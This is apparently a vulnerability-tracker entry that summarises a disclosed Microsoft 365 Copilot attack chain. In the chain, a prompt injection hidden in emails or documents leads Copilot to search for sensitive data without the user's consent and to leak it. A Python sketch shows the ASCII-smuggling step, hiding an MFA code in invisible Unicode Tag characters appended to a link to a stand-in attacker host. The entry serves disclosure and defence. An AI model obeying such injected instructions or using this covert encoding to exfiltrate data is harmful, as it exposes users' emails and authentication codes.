Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information
Summary
Microsoft 365 Copilot has a vulnerability chain that allows attackers to exfiltrate personal information such as emails and MFA codes. The exploit combines prompt injection (hiding malicious instructions in an email or document that Copilot processes), automatic tool invocation (the injected instructions make Copilot search for additional sensitive data without user consent), and ASCII smuggling (encoding the stolen data in invisible Unicode Tag characters embedded in a clickable link) to extract and exfiltrate personal information.
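To illustrate the ASCII-smuggling step described above, here is a minimal sketch of how data can be hidden in invisible characters: each ASCII character is shifted into the Unicode "Tags" block (U+E0000–U+E007F), whose code points render as nothing in most UIs, so a link can carry a hidden payload. The `attacker.example` URL is a hypothetical placeholder, not from the original write-up.

```python
# Sketch of ASCII smuggling via the invisible Unicode Tags block.
# Each ASCII character c maps to U+E0000 + ord(c); the result is a
# string of format characters that most renderers display as nothing.

def smuggle(text: str) -> str:
    """Encode ASCII text as invisible Unicode Tag characters."""
    return "".join(chr(0xE0000 + ord(c)) for c in text)

def unsmuggle(hidden: str) -> str:
    """Recover the original ASCII text from Tag characters."""
    return "".join(
        chr(ord(c) - 0xE0000)
        for c in hidden
        if 0xE0000 <= ord(c) <= 0xE007F
    )

secret = "MFA:123456"
# Hypothetical exfiltration link: the payload is appended but invisible
# when the link text is rendered, so a user sees an innocuous URL.
link = "https://attacker.example/?" + smuggle(secret)
```

Decoding on the attacker's side is the inverse shift, which is why the write-up treats these characters as a covert channel rather than mere obfuscation.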
Classification
Affected Vendors
Microsoft
Related Issues
CVE-2025-45150: Insecure permissions in LangChain-ChatGLM-Webui commit ef829 allows attackers to arbitrarily view and download sensitive […]
CVE-2025-54868: LibreChat is a ChatGPT clone with additional features. In versions 0.0.6 through 0.7.7-rc1, an exposed testing endpoint […]
Original source: https://embracethered.com/blog/posts/2024/m365-copilot-prompt-injection-tool-invocation-and-data-exfil-using-ascii-smuggling/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 95%